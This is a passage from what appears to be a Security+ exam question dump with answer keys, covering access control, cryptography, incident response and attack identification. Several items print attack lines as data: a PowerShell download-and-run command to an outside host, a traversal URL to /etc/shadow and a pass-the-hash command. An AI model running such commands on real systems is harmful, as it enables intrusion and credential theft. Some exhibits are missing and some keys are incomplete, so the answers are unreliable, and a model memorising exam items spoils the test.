C. Cryptographic attack
D. Password attack
Correct Answer: A

Question #348
A security analyst reviews web server logs and notices the following lines:
Which of the following vulnerabilities has the attacker exploited? (Choose two.)
A. Race condition
B. LFI
C. Pass the hash
D. XSS
E. RFI
F. Directory traversal
Correct Answer: BF

Question #349
An information security manager for an organization is completing a PCI DSS self-assessment for the first time. Which of the following is the
MOST likely reason for this type of assessment?
A. An international expansion project is currently underway.
B. Outside consultants utilize this tool to measure security maturity.
C. The organization is expecting to process credit card information.
D. A government regulator has requested this audit to be completed.
Correct Answer: C

Question #350
Physical access to the organization's servers in the data center requires entry and exit through multiple access points: a lobby, an access control
vestibule, three doors leading to the server floor, a door to the server floor itself, and eventually to a caged area solely for the organization’s
hardware. Which of the following controls is described in this scenario?
A. Compensating
B. Deterrent
C. Preventive
D. Detective
Correct Answer: C

Question #351
A new security engineer has started hardening systems. One of the hardening techniques the engineer is using involves disabling remote logins to
the NAS. Users are now reporting the inability to use SCP to transfer files to the NAS, even though the data is still viewable from the users’ PCs.
Which of the following is the MOST likely cause of this issue?
A. TFTP was disabled on the local hosts.
B. SSH was turned off instead of modifying the configuration file.
C. Remote login was disabled in the networkd.conf instead of using the sshd.conf.
D. Network services are no longer running on the NAS.
Correct Answer: B

Question #352
An enterprise has hired an outside security firm to conduct penetration testing on its network and applications. The firm has been given the
documentation only available to the customers of the applications. Which of the following BEST represents the type of testing that will occur?
A. Bug bounty
B. Black-box
C. Gray-box
D. White-box
Correct Answer: C

Question #353
A network engineer and a security engineer are discussing ways to monitor network operations. Which of the following is the BEST method?
A. Disable Telnet and force SSH.
B. Establish a continuous ping.
C. Utilize an agentless monitor.
D. Enable SNMPv3 with passwords.
Correct Answer: D

Question #354
A security analyst is looking for a solution to help communicate to the leadership team the severity levels of the organization’s vulnerabilities.
Which of the following would BEST meet this need?
A. CVE
B. SIEM
C. SOAR
D. CVSS
Correct Answer: D

Question #355
A company is switching to a remote work model for all employees. All company and employee resources will be in the cloud. Employees must use
their personal computers to access the cloud computing environment. The company will manage the operating system. Which of the following
deployment models is the company implementing?
A. CYOD
B. MDM
C. COPE
D. VDI
Correct Answer: D

Question #356
A security administrator needs to inspect in-transit files on the enterprise network to search for PII, credit card data, and classification words.
Which of the following would be the BEST to use?
A. IDS solution
B. EDR solution
C. HIPS software solution
D. Network DLP solution
Correct Answer: D

Question #357
The Chief Executive Officer announced a new partnership with a strategic vendor and asked the Chief Information Security Officer to federate user
digital identities using SAML-based protocols. Which of the following will this enable?
A. SSO
B. MFA
C. PKI
D. DLP
Correct Answer: A

Question #358
An employee’s company account was used in a data breach. Interviews with the employee revealed:
• The employee was able to avoid changing passwords by using a previous password again.
• The account was accessed from a hostile, foreign nation, but the employee has never traveled to any other countries.
Which of the following can be implemented to prevent these issues from reoccurring? (Choose two.)
A. Geographic dispersal
B. Password complexity
C. Password history
D. Geotagging
E. Password lockout
F. Geofencing
Correct Answer: C

Question #359
A large industrial system’s smart generator monitors the system status and sends alerts to third-party maintenance personnel when critical
failures occur. While reviewing the network logs, the company’s security manager notices the generator’s IP is sending packets to an internal file
server’s IP
. Which of the following mitigations would be BEST for the security manager to implement while maintaining alerting capabilities?
A. Segmentation
B. Firewall allow list
C. Containment
D. Isolation
Correct Answer: A

Question #360
Which of the following technologies is used to actively monitor for specific file types being transmitted on the network?
A. File integrity monitoring
B. Honeynets
C. Tcpreplay
D. Data loss prevention
Correct Answer: D

Question #361
As part of the building process for a web application, the compliance team requires that all PKI certificates are rotated annually and can only
contain wildcards at the secondary subdomain level. Which of the following certificate properties will meet these requirements?
A. HTTPS://*.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022
B. HTTPS://app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022
C. HTTPS://*.app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022
D. HTTPS://*.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2023
Correct Answer: C

Question #362
A global pandemic is forcing a private organization to close some business units and reduce staffing at others. Which of the following would be
BEST to help the organization's executives determine their next course of action?
A. An incident response plan
B. A communication plan
C. A disaster recovery plan
D. A business continuity plan
Correct Answer: D

Question #363
A cybersecurity analyst reviews the log files from a web server and sees a series of files that indicate a directory traversal attack has occurred.
Which of the following is the analyst MOST likely seeing?
A. http://sample.url.com/
B. http://sample.url.com/someotherpageonsite/../../../etc/shadow
C. http://sample.url.com/select-from-database-where-password-null
D. http://redirect.sameple.url.sampleurl.com/malicious-dns-redirect
Correct Answer: B

Question #364
A candidate attempts to go to http://comptia.org but accidentally visits http://comptiia.org. The malicious website looks exactly like the
legitimate website. Which of the following BEST describes this type of attack?
A. Reconnaissance
B. Impersonation
C. Typosquatting
D. Watering-hole
Correct Answer: C

Question #365
The marketing department at a retail company wants to publish an internal website to the internet so it is reachable by a limited number of
specific, external service providers in a secure manner. Which of the following configurations would be BEST to fulfil this requirement?
A. NAC
B. ACL
C. WAF
D. NAT
Correct Answer: B

Question #366
A retail executive recently accepted a job with a major competitor. The following week, a security analyst reviews the security logs and identifies
successful logon attempts to access the departed executive’s accounts. Which of the following security practices would have addressed the
issue?
A. A non-disclosure agreement
B. Least privilege
C. An acceptable use policy
D. Offboarding
Correct Answer: D

Question #367
A network-connected magnetic resonance imaging (MRI) scanner at a hospital is controlled and operated by an outdated and unsupported
specialized Windows OS. Which of the following is MOST likely preventing the IT manager at the hospital from upgrading the specialized OS?
A. The time needed for the MRI vendor to upgrade the system would negatively impact patients.
B. The MRI vendor does not support newer versions of the OS.
C. Changing the OS breaches a support SLA with the MRI vendor.
D. The IT team does not have the budget required to upgrade the MRI scanner.
Correct Answer: B

Question #368
A company received a “right to be forgotten” request. To legally comply, the company must remove data related to the requester from its systems.
Which of the following is the company MOST likely complying with?
A. NIST CSF
B. GDPR
C. PCI DSS
D. ISO 27001
Correct Answer: B

Question #369
A security team suspects that the cause of recent power consumption overloads is the unauthorized use of empty power outlets in the network
rack. Which of the following options will mitigate this issue without compromising the number of outlets available?
A. Adding a new UPS dedicated to the rack
B. Installing a managed PDU
C. Using only a dual power supplies unit
D. Increasing power generator capacity
Correct Answer: B

Question #370
An engineer wants to inspect traffic to a cluster of web servers in a cloud environment. Which of the following solutions should the engineer
implement?
A. CASB
B. WAF
C. Load balancer
D. VPN
Correct Answer: B

Question #371
A security analyst needs to implement an MDM solution for BYOD users that will allow the company to retain control over company emails
residing on the devices and limit data exfiltration that might occur if the devices are lost or stolen. Which of the following would BEST meet these
requirements? (Choose two.)
A. Full device encryption
B. Network usage rules
C. Geofencing
D. Containerization
E. Application approve list
F. Remote control
Correct Answer: AD

Question #372
A security administrator is evaluating remote access solutions for employees who are geographically dispersed. Which of the following would
provide the MOST secure remote access? (Choose two.)
A. IPSec
B. SFTP
C. SRTP
D. LDAPS
E. S/MIME
F. SSL VPN
Correct Answer: AF

Question #373
A malicious actor recently penetrated a company's network and moved laterally to the data center. Upon investigation, a forensics firm wants to
know what was in the memory on the compromised server. Which of the following files should be given to the forensics firm?
A. Security
B. Application
C. Dump
D. Syslog
Correct Answer: C

Question #374
A company is looking to migrate some servers to the cloud to minimize its technology footprint. The company has a customer relationship
management system on premises. Which of the following solutions will require the LEAST infrastructure and application support from the
company?
A. SaaS
B. IaaS
C. PaaS
D. SDN
Correct Answer: A

Question #375
A network administrator needs to determine the sequence of a server farm’s logs. Which of the following should the administrator consider?
(Choose two.)
A. Chain of custody
B. Tags
C. Reports
D. Time stamps
E. Hash values
F. Time offset
Correct Answer: DF

Question #376
Which of the following is the BEST reason to maintain a functional and effective asset management policy that aids in ensuring the security of an
organization?
A. To provide data to quantify risk based on the organization's systems
B. To keep all software and hardware fully patched for known vulnerabilities
C. To only allow approved, organization-owned devices onto the business network
D. To standardize by selecting one laptop model for all users in the organization
Correct Answer: A

Question #377
A security administrator, who is working for a government organization, would like to utilize classification and granular planning to secure top
secret data and grant access on a need-to-know basis. Which of the following access control schemas should the administrator consider?
A. Mandatory
B. Rule-based
C. Discretionary
D. Role-based
Correct Answer: A

Question #378
An organization is outlining data stewardship roles and responsibilities. Which of the following employee roles would determine the purpose of
data and how to process it?
A. Data custodian
B. Data controller
C. Data protection officer
D. Data processor
Correct Answer: B

Question #379
Multiple beaconing activities to a malicious domain have been observed. The malicious domain is hosting malware from various endpoints on the
network. Which of the following technologies would be BEST to correlate the activities between the different endpoints?
A. Firewall
B. SIEM
C. IPS
D. Protocol analyzer
Correct Answer: B

Question #380
Which of the following types of controls is a turnstile?
A. Physical
B. Detective
C. Corrective
D. Technical
Correct Answer: A

Question #381
Users report access to an application from an internal workstation is still unavailable to a specific server, even after a recent firewall rule
implementation that was requested for this access. ICMP traffic is successful between the two devices. Which of the following tools should the
security analyst use to help identify if the traffic is being blocked?
A. nmap
B. tracert
C. ping
D. ssh
Correct Answer: A

Question #382
As part of annual audit requirements, the security team performed a review of exceptions to the company policy that allows specific users the
ability to use USB storage devices on their laptops. The review yielded the following results:
• The exception process and policy have been correctly followed by the majority of users.
• A small number of users did not create tickets for the requests but were granted access.
• All access had been approved by supervisors.
• Valid requests for the access sporadically occurred across multiple departments.
• Access, in most cases, had not been removed when it was no longer needed.
Which of the following should the company do to ensure that appropriate access is not disrupted but unneeded access is removed in a reasonable
time frame?
A. Create an automated, monthly attestation process that removes access if an employee’s supervisor denies the approval.
B. Remove access for all employees and only allow new access to be granted if the employee’s supervisor approves the request.
C. Perform a quarterly audit of all user accounts that have been granted access and verify the exceptions with the management team.
D. Implement a ticketing system that tracks each request and generates reports listing which employees actively use USB storage devices.
Correct Answer: C

Question #383
A financial institution would like to store its customer data in a cloud but still allow the data to be accessed and manipulated while encrypted.
Doing so would prevent the cloud service provider from being able to decipher the data due to its sensitivity. The financial institution is not
concerned about computational overheads and slow speeds. Which of the following cryptographic techniques would BEST meet the requirement?
A. Asymmetric
B. Symmetric
C. Homomorphic
D. Ephemeral
Correct Answer: C

Question #384
A cryptomining company recently deployed a new antivirus application to all of its mining systems. The installation of the antivirus application
was tested on many personal devices, and no issues were observed. Once the antivirus application was rolled out to the servers, constant issues
were reported. As a result, the company decided to remove the mining software. The antivirus application was MOST likely classifying the
software as:
A. a rootkit.
B. a PUP
.
C. a backdoor.
D. ransomware.
E. a RAT.
Correct Answer: B

Question #385
A cybersecurity administrator is using iptables as an enterprise firewall. The administrator created some rules, but the network now seems to be
unresponsive. All connections are being dropped by the firewall. Which of the following would be the BEST option to remove the rules?
A. # iptables -t mangle -X
B. # iptables -F
C. # iptables -Z
D. # iptables -P INPUT -j DROP
Correct Answer: B

Question #386
An incident response technician collected a mobile device during an investigation. Which of the following should the technician do to maintain
chain of custody?
A. Document the collection and require a sign-off when possession changes.
B. Lock the device in a safe or other secure location to prevent theft or alteration.
C. Place the device in a Faraday cage to prevent corruption of the data.
D. Record the collection in a blockchain-protected public ledger.
Correct Answer: A

Question #387
A company recently implemented a patch management policy; however, vulnerability scanners have still been flagging several hosts, even after the
completion of the patch process. Which of the following is the MOST likely cause of the issue?
A. The vendor firmware lacks support.
B. Zero-day vulnerabilities are being discovered.
C. Third-party applications are not being patched.
D. Code development is being outsourced.
Correct Answer: C

Question #388
Which of the following controls would provide the BEST protection against tailgating?
A. Access control vestibule
B. Closed-circuit television
C. Proximity card reader
D. Faraday cage
Correct Answer: A

Question #389
A penetration tester executes the command crontab -l while working in a Linux server environment. The penetration tester observes the following
string in the current user's list of cron jobs:
*/10 * * * * root /writable/update.sh
Which of the following actions should the penetration tester perform NEXT?
A. Privilege escalation
B. Memory leak
C. Directory traversal
D. Race condition
Correct Answer: A

Question #390
An employee received an email with an unusual file attachment named Updates.lnk. A security analyst is reverse engineering what the file does
and finds that it executes the following script:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile
$env:TEMP\autoupdate.dll;Start-Process rundl132.exe $env:TEMP\autoupdate.dll
Which of the following BEST describes what the analyst found?
A. A PowerShell code is performing a DLL injection.
B. A PowerShell code is displaying a picture.
C. A PowerShell code is configuring environmental variables.
D. A PowerShell code is changing Windows Update settings.
Correct Answer: A

Question #391
A security engineer obtained the following output from a threat intelligence source that recently performed an attack on the company’s server:
Which of the following BEST describes this kind of attack?
A. Directory traversal
B. SQL injection
C. API
D. Request forgery
Correct Answer: A

Question #392
An organization’s Chief Information Security Officer is creating a position that will be responsible for implementing technical controls to protect
data, including ensuring backups are properly maintained. Which of the following roles would MOST likely include these responsibilities?
A. Data protection officer
B. Data owner
C. Backup administrator
D. Data custodian
E. Internal auditor
Correct Answer: D

Question #393
Which of the following BEST describes the team that acts as a referee during a penetration-testing exercise?
A. White team
B. Purple team
C. Green team
D. Blue team
E. Red team
Correct Answer: A

Question #394
Which of the following would MOST likely be identified by a credentialed scan but would be missed by an uncredentialed scan?
A. Vulnerabilities with a CVSS score greater than 6.9.
B. Critical infrastructure vulnerabilities on non-IP protocols.
C. CVEs related to non-Microsoft systems such as printers and switches.
D. Missing patches for third-party software on Windows workstations and servers.
Correct Answer: D

Question #395
A security administrator is seeking a solution to prevent unauthorized access to the internal network. Which of the following security solutions
should the administrator choose?
A. MAC filtering
B. Anti-malware
C. Translation gateway
D. VPN
Correct Answer: D

Question #396
A host was infected with malware. During the incident response, Joe, a user, reported that he did not receive any emails with links, but he had
been browsing the internet all day. Which of the following would MOST likely show where the malware originated?
A. The DNS logs
B. The web server logs
C. The SIP traffic logs
D. The SNMP logs
Correct Answer: A

Question #397
A third party asked a user to share a public key for secure communication. Which of the following file formats should the user choose to share the
key?
A. .pfx
B. .csr
C. .pvk
D. .cer
Correct Answer: D

Question #398
A security administrator is working on a solution to protect passwords stored in a database against rainbow table attacks. Which of the following
should the administrator consider?
A. Hashing
B. Salting
C. Lightweight cryptography
D. Steganography
Correct Answer: B

Question #399
A company wants to deploy PKI on its internet-facing website. The applications that are currently deployed are:
• www.company.com (main website)
• contactus.company.com (for locating a nearby location)
• quotes.company.com (for requesting a price quote)
The company wants to purchase one SSL certificate that will work for all the existing applications and any future applications that follow the
same naming conventions, such as store.company.com. Which of the following certificate types would BEST meet the requirements?
A. SAN
B. Wildcard
C. Extended validation
D. Self-signed
Correct Answer: B

Question #400
A security analyst is concerned about traffic initiated to the dark web from the corporate LAN. Which of the following networks should the analyst
monitor?
A. SFTP
B. AIS
C. Tor
D. IoC
Correct Answer: C

Question #401
A security analyst is reviewing logs on a server and observes the following output:
Which of the following is the security analyst observing?
A. A rainbow table attack
B. A password-spraying attack
C. A dictionary attack
D. A keylogger attack
Correct Answer: C

Question #402
A company is launching a website in a different country in order to capture user information that a marketing business can use. The company
itself will not be using the information. Which of the following roles is the company assuming?
A. Data owner
B. Data processor
C. Data steward
D. Data collector
Correct Answer: B

Question #403
An organization would like to remediate the risk associated with its cloud service provider not meeting its advertised 99.999% availability metrics.
Which of the following should the organization consult for the exact requirements for the cloud provider?
A. SLA
B. BPA
C. NDA
D. MOU
Correct Answer: A

Question #404
Which of the following secure application development concepts aims to block verbose error messages from being shown in a user’s interface?
A. OWASP
B. Obfuscation/camouflage
C. Test environment
D. Prevention of information exposure
Correct Answer: D

Question #405
If a current private key is compromised, which of the following would ensure it cannot be used to decrypt all historical data?
A. Perfect forward secrecy
B. Elliptic-curve cryptography
C. Key stretching
D. Homomorphic encryption
Correct Answer: A

Question #406
An organization has expanded its operations by opening a remote office. The new office is fully furnished with office resources to support up to 50
employees working on any given day. Which of the following VPN solutions would BEST support the new office?
A. Always-on
B. Remote access
C. Site-to-site
D. Full tunnel
Correct Answer: C

Question #407
Which of the following scenarios BEST describes a risk reduction technique?
A. A security control objective cannot be met through a technical change, so the company purchases insurance and is no longer concerned
about losses from data breaches.
B. A security control objective cannot be met through a technical change, so the company implements a policy to train users on a more secure
method of operation.
C. A security control objective cannot be met through a technical change, so the company performs regular audits to determine if violations
have occurred.
D. A security control objective cannot be met through a technical change, so the Chief Information Officer decides to sign off on the risk.
Correct Answer: B

Question #408
Which of the following social engineering attacks BEST describes an email that is primarily intended to mislead recipients into forwarding the
email to others?
A. Hoaxing
B. Pharming
C. Watering-hole
D. Phishing
Correct Answer: A

Question #409
Which of the following will provide the BEST physical security countermeasures to stop intruders? (Choose two.)
A. Alarms
B. Signage
C. Lighting
D. Access control vestibules
E. Fencing
F. Sensors
Correct Answer: DE

Question #410
An organization is concerned about hackers potentially entering a facility and plugging in a remotely accessible Kali Linux box. Which of the
following should be the first lines of defense against such an attack? (Choose two.)
A. MAC filtering
B. Zero trust segmentation
C. Network access control
D. Access control vestibules
E. Guards
F. Bollards
Correct Answer: DE

Question #411
An employee used a corporate mobile device during a vacation. Multiple contacts were modified in the device during the employee's vacation.
Which of the following attack methods did an attacker use to insert the contacts without having physical access to the device?
A. Jamming
B. Bluejacking
C. Disassociation
D. Evil twin
Correct Answer: B

Question #412
A security administrator wants to implement a program that tests a user's ability to recognize attacks over the organization’s email system. Which
of the following would be best suited for this task?
A. Social media analysis
B. Annual information security training
C. Gamification
D. Phishing campaign
Correct Answer: D

Question #413
A security analyst is reviewing packet capture data from a compromised host on the network. In the packet capture, the analyst locates packets
that contain large amounts of text. Which of the following is most likely installed on the compromised host?
A. Keylogger
B. Spyware
C. Trojan
D. Ransomware
Correct Answer: A

Question #414
An organization needs to implement more stringent controls over administrator/root credentials and service accounts. Requirements for the
project include:
• Check-in/checkout of credentials
• The ability to use but not know the password
• Automated password changes
• Logging of access to credentials
Which of the following solutions would meet the requirements?
A. OAuth 2.0
B. Secure Enclave
C. A privileged access management system
D. An OpenID Connect authentication system
Correct Answer: C

Question #415
A systems analyst is responsible for generating a new digital forensics chain-of-custody form. Which of the following should the analyst include in
this documentation? (Choose two).
A. The order of volatility
B. A forensics NDA
C. The provenance of the artifacts
D. The vendor's name
E. The date and time
F. A warning banner
Correct Answer: CE

Question #416
A security analyst reviews web server logs and notices the following line:
Which of the following vulnerabilities is the attacker trying to exploit?
A. SSRF
B. CSRF
C. XSS
D. SQLi
Correct Answer: D

Question #417
A user is having network connectivity issues when working from a coffee shop. The user has used the coffee shop as a workspace for several
months without any issues. None of the other customers at the coffee shop are experiencing these issues. A help desk analyst at the user's
company reviews the following Wi-Fi log:
Which of the following best describes what is causing this issue?
A. Another customer has configured a rogue access point.
B. The coffee shop network is using multiple frequencies.
C. A denial-of-service attack by disassociation is occurring.
D. An evil twin access point is being utilized.
Correct Answer: C

Question #418
Which of the following is a physical security control that ensures only the authorized user is present when gaining access to a secured area?
A. A biometric scanner
B. A smart card reader
C. A PKI token
D. A PIN pad
Correct Answer: A

Question #419
During a forensic investigation, a security analyst discovered that the following command was run on a compromised host:
crackmapexec smb 192.168.10.232 -u localadmin -H 0A3CE8D07A46E5C51070F03593E0A5E6
Which of the following attacks occurred?
A. Buffer overflow
B. Pass the hash
C. SQL injection
D. Replay attack
Correct Answer: B

Question #420
A company is moving to new location. The systems administrator has provided the following server room requirements to the facilities staff:
• Consistent power levels in case of brownouts or voltage spikes
• A minimum of 30 minutes runtime following a power outage
• Ability to trigger graceful shutdowns of critical systems
Which of the following would BEST meet the requirements?
A. Maintaining a standby, gas-powered generator
B. Using large surge suppressors on computer equipment
C. Configuring managed PDUs to monitor power levels
D. Deploying an appropriately sized, network-connected UPS device
Correct Answer: D

Question #421
Which of the following would provide guidelines on how to label new network devices as part of the initial configuration?
A. IP schema
B. Application baseline configuration
C. Standard naming convention policy
D. Wireless LAN and network perimeter diagram
Correct Answer: C

Question #422
A systems engineer thinks a business system has been compromised and is being used to exfiltrate data to a competitor. The engineer contacts
the CSIRT. The CSIRT tells the engineer to immediately disconnect the network cable and to not do anything else. Which of the following is the
most likely reason for this request?
A. The CSIRT thinks an insider threat is attacking the network.
B. Outages of business-critical systems cost too much money.
C. The CSIRT does not consider the systems engineer to be trustworthy.
D. Memory contents, including fileless malware, are lost when the power is turned off.
Correct Answer: D

Question #423
Which of the following best describes the situation where a successfully onboarded employee who is using a fingerprint reader is denied access
at the company's main gate?
A. Crossover error rate
B. False match rate
C. False rejection
D. False positive
Correct Answer: C

Question #424
Which of the following should customers who are involved with UI developer agreements be concerned with when considering the use of these
products on highly sensitive projects?
A. Weak configurations
B. Integration activities
C. Unsecure user accounts
D. Outsourced code development
Correct Answer: D

Question #425
Which of the following identifies the point in time when an organization will recover data in the event of an outage?
A. ALE
B. RPO
C. MTBF
D. ARO
Correct Answer: B

Question #426
A police department is using the cloud to share information with city officials. Which of the following cloud models describes this scenario?
A. Hybrid
B. Private
C. Public
D. Community
Correct Answer: D

Question #427
A user reports that a bank’s website no longer displays a padlock symbol. A security analyst views the user's screen and notices the connection is
using HTTP instead of HTTPS. Which of the following attacks is most likely occurring?
A. Memory leak
B. SSL stripping
C. API
D. Pass the hash
Correct Answer: B

Question #428
A data center has experienced an increase in under-voltage events following electrical grid maintenance outside the facility. These events are
leading to occasional losses of system availability. Which of the following would be the most cost-effective solution for the data center to
implement?
A. Uninterruptible power supplies with battery backup
B. Managed power distribution units to track these events
C. A generator to ensure consistent, normalized power delivery
D. Dual power supplies to distribute the load more evenly
Correct Answer: A

Question #429
A security architect is designing a remote access solution for a business partner. The business partner needs to access one Linux server at the
company. The business partner wants to avoid managing a password for authentication and additional software installation. Which of the
following should the architect recommend?
A. Soft token
B. Smart card
C. CSR
D. SSH key
Correct Answer: D

Question #430
A security analyst is assisting a team of developers with best practices for coding. The security analyst would like to defend against the use of
SQL injection attacks. Which of the following should the security analyst recommend first?
A. Tokenization
B. Input validation
C. Code signing
D. Secure cookies
Correct Answer: B

Question #431
Cloud security engineers are planning to allow and deny access to specific features in order to increase data security. Which of the following
cloud features is the most appropriate to ensure access is granted properly?
A. API integrations
B. Auditing
C. Resource policies
D. Virtual networks
Correct Answer: C

Question #432
A security operations technician is searching the log named /var/messages for any events that were associated with a workstation with the IP
address 10.1.1.1. Which of the following would provide this information?
A. cat /var/messages | grep 10.1.1.1
B. grep 10.1.1.1 | cat /var/messages
C. grep /var/messages | cat 10.1.1.1
D. cat 10.1.1.1 | grep /var/messages
Correct Answer: A

Question #433
A security analyst is investigating a report from a penetration test. During the penetration test, consultants were able to download sensitive data
from a back-end server. The back-end server was exposing an API that should have only been available from the company's mobile application.
After reviewing the back-end server logs, the security analyst finds the following entries:
Which of the following is the most likely cause of the security control bypass?
A. IP address allow list
B. User-agent spoofing
C. WAF bypass
D. Referrer manipulation
Correct Answer: B

Question #434
Which of the following processes would most likely help an organization that has conducted an incident response exercise to improve
performance and identify challenges?
A. Lessons learned
B. Identification
C. Simulation
D. Containment
Correct Answer: A

Question #435
Which of the following control types is patch management classified under?
A. Deterrent
B. Physical
C. Corrective
D. Detective
Correct Answer: C

Question #436
A security analyst is investigating what appears to be unauthorized access to a corporate web application. The security analyst reviews the web
server logs and finds the flowing entries:
Which of the following password attacks is taking place?
A. Dictionary
B. Brute-force
C. Rainbow table
D. Spraying
Correct Answer: B

Question #437
A company that provides an online streaming service made its customers' personal data, including names and email addresses, publicly available
in a cloud storage service. As a result, the company experienced an increase in the number of requests to delete user accounts. Which of the
following BEST describes the consequence of this data disclosure?
A. Regulatory fines
B. Reputation damage
C. Increased insurance costs
D. Financial loss
Correct Answer: B

Question #438
An organization has been experiencing outages during holiday sales and needs to ensure availability of its point-of-sale systems. The IT
administrator has been asked to improve both server-data fault tolerance and site availability under high consumer load. Which of the following
are the best options to accomplish this objective? (Choose two.)
A. Load balancing
B. Incremental backups
C. UPS
D. RAID
E. Dual power supply
F. VLAN
Correct Answer: AD

Question #439
Which of the following can be used to detect a hacker who is stealing company data over port 80?
A. Web application scan
B. Threat intelligence
C. Log aggregation
D. Packet capture
Correct Answer: D

Question #440
A company recently enhanced mobile device configuration by implementing a set of security controls biometrics context-aware authentication and
full device encryption. Even with these settings in place, an unattended phone was used by a malicious actor to access corporate data. Which of
the following additional controls should be put in place first?
A. GPS tagging
B. Remote wipe
C. Screen lock timer
D. SEAndroid
Correct Answer: C

Question #441
An organization wants to quickly assess how effectively the IT team hardened new laptops. Which of the following would be the best solution to
perform this assessment?
A. Install a SIEM tool and properly configure it to read the OS configuration files
B. Load current baselines into the existing vulnerability scanner
C. Maintain a risk register with each security control marked as compliant or non-compliant
D. Manually review the secure configuration guide checklists
Correct Answer: B

Question #442
A user is trying to upload a tax document which the corporate finance department requested but a security program is prohibiting the upload. A
security analyst determines the file contains PII. Which of the following steps can the analyst take to correct this issue?
A. Create a URL filter with an exception for the destination website
B. Add a firewall rule to the outbound proxy to allow file uploads
C. Issue a new device certificate to the user's workstation
D. Modify the exception list on the DLP to allow the upload
Correct Answer: D

Question #443
A cybersecurity analyst at Company A is working to establish a secure communication channel with a counterpart at Company B, which is 3,000
miles (4,828 kilometers) away. Which of the following concepts would help the analyst meet this goal in a secure manner?
A. Digital signatures
B. Key exchange
C. Salting
D. PPTP
Correct Answer: B

Question #444
A security analyst is reviewing computer logs because a host was compromised by malware. After the computer was infected it displayed an error
screen and shut down. Which of the following should the analyst review first to determine more information?
A. Dump file
B. System log
C. Web application log
D. Security log
Correct Answer: B

Question #445
A security architect is working on an email solution that will send sensitive data. However, funds are not currently available in the budget for
building additional infrastructure. Which of the following should the architect choose?
A. POP
B. IPSec
C. IMAP
D. PGP
Correct Answer: D

Question #446
A user reset the password for a laptop but has been unable to log in to it since then. In addition, several unauthorized emails were sent on the
user’s behalf recently. The security team investigates the issue and identifies the following findings:
• Firewall logs show excessive traffic from the laptop to an external site.
• Unknown processes were running on the laptop.
• RDP connections that appeared to be authorized were made to other network devices from the laptop.
• High bandwidth utilization alerts from that user's username.
Which of the following is most likely installed on the laptop?
A. Worm
B. Keylogger
C. Trojan
D. Logic bomb
Correct Answer: C

Question #447
A systems administrator is required to enforce MFA for corporate email account access, relying on the possession factor. Which of the following
authentication methods should the systems administrator choose? (Choose two.)
A. Passphrase
B. Time-based one-time password
C. Facial recognition
D. Retina scan
E. Hardware token
F. Fingerprints
Correct Answer: BE

Question #448
Which of the following best describes a technique that compensates researchers for finding vulnerabilities?
A. Penetration testing
B. Code review
C. Wardriving
D. Bug bounty
Correct Answer: D

Question #449
Which of the following biometric authentication methods is the most accurate?
A. Gait
B. Retina
C. Signature
D. Voice
Correct Answer: B

Question #450
A security team will be outsourcing several key functions to a third party and will require that:
• Several of the functions will carry an audit burden
• Attestations will be performed several times a year
• Reports will be generated on a monthly basis
Which of the following best describes the document that is used to define these requirements and stipulate how and when they are performed by
the third party?
A. MOU
B. AUP
C. SLA
D. MSA
Correct Answer: C

Question #451
A small, local company experienced a ransomware attack. The company has one web-facing server and a few workstations. Everything is behind
an ISP firewall. A single web-facing server is set up on the router to forward all polls so that the server is viewable from the internet. The company
uses an older version of third-party software to manage the website. The assets were never patched. Which of the following should be done to
prevent an attack like this from happening again? (Choose three.)
A. install DLP software to prevent data loss
B. Use the latest version of software
C. Install a SIEM device
D. Implement MDM
E. Implement a screened subnet for the web server
F. Install an endpoint security solution
G. Update the website certificate and revoke the existing ones
H. Deploy additional network sensors
Correct Answer: BEF

Question #452
A security investigation revealed that malicious software was installed on a server using a server administrator's credentials. During the
investigation, the server administrator explained that Telnet was regularly used to log in. Which of the following most likely occurred?
A. A spraying attack was used to determine which credentials to use
B. A packet capture tool was used to steal the password
C. A remote-access Trojan was used to install the malware
D. A dictionary attack was used to log in as the server administrator
Correct Answer: B

Question #453
Which of the following roles would most likely have direct access to the senior management team?
A. Data custodian
B. Data owner
C. Data protection officer
D. Data controller
Correct Answer: C

Question #454
Stakeholders at an organization must be kept aware of any incidents and receive updates on status changes as they occur. Which of the following
plans would fulfill this requirement?
A. Communication plan
B. Disaster recovery plan
C. Business continuity plan
D. Risk plan
Correct Answer: A

Question #455
An employee who is using a mobile device for work, is required to use a fingerprint to unlock the device. Which of the following is this an example
of?
A. Something you know
B. Something you are
C. Something you have
D. Somewhere you are
Correct Answer: B

Question #456
Which of the following security controls can be used to prevent multiple people from using a unique card swipe and being admitted to a secure
entrance?
A. Visitor logs
B. Faraday cages
C. Access control vestibules
D. Motion detection sensors
Correct Answer: C

Question #457
Unauthorized devices have been detected on the internal network. The devices' locations were traced to Ethernet ports located in conference
rooms. Which of the following would be the best technical controls to implement to prevent these devices from accessing the internal network?
A. NAC
B. DLP
C. IDS
D. MFA
Correct Answer: A

Question #458
A Chief Information Security Officer (CISO) wants to implement a new solution that can protect against certain categories of websites whether the
employee is in the office or away. Which of the following solutions should the CISO implement?
A. WAF
B. SWG
C. VPN
D. HIDS
Correct Answer: B

Question #459
A security analyst is using OSINT to gather information to verify whether company data is available publicly. Which of the following is the best
application for the analyst to use?
A. theHarvester
B. Cuckoo
C. Nmap
D. Nessus
Correct Answer: A

Question #460
A network engineer receives a call regarding multiple LAN-connected devices that are on the same switch. The devices have suddenly been
experiencing speed and latency issues while connecting to network resources. The engineer enters the command show mac address-table and
reviews the following output:
Which of the following best describes the attack that is currently in progress'?
A. MAC flooding
B. Evil twin
C. ARP poisoning
D. DHCP spoofing
Correct Answer: A

Question #461
A security administrator needs to add fault tolerance and load balancing to the connection from the file server to the backup storage. Which of the
following is the best choice to achieve this objective?
A. Multipath
B. RAID
C. Segmentation
D. 802.11
Correct Answer: A

Question #462
Which of the following incident response phases should the proper collection of the detected IoCs and establishment of a chain of custody be
performed before?
A. Containment
B. Identification
C. Preparation
D. Recovery
Correct Answer: A

Question #463
Which of the following measures the average time that equipment will operate before it breaks?
A. SLE
B. MTBF
C. RTO
D. ARO
Correct Answer: B

Question #464
A security administrator examines the ARP table of an access switch and sees the following output:
A. DDoS on Fa0/2 port
B. MAC flooding on Fa0/2 port
C. ARP poisoning on Fa0/1 port
D. DNS poisoning on port Fa0/1
Correct Answer: B

Question #465
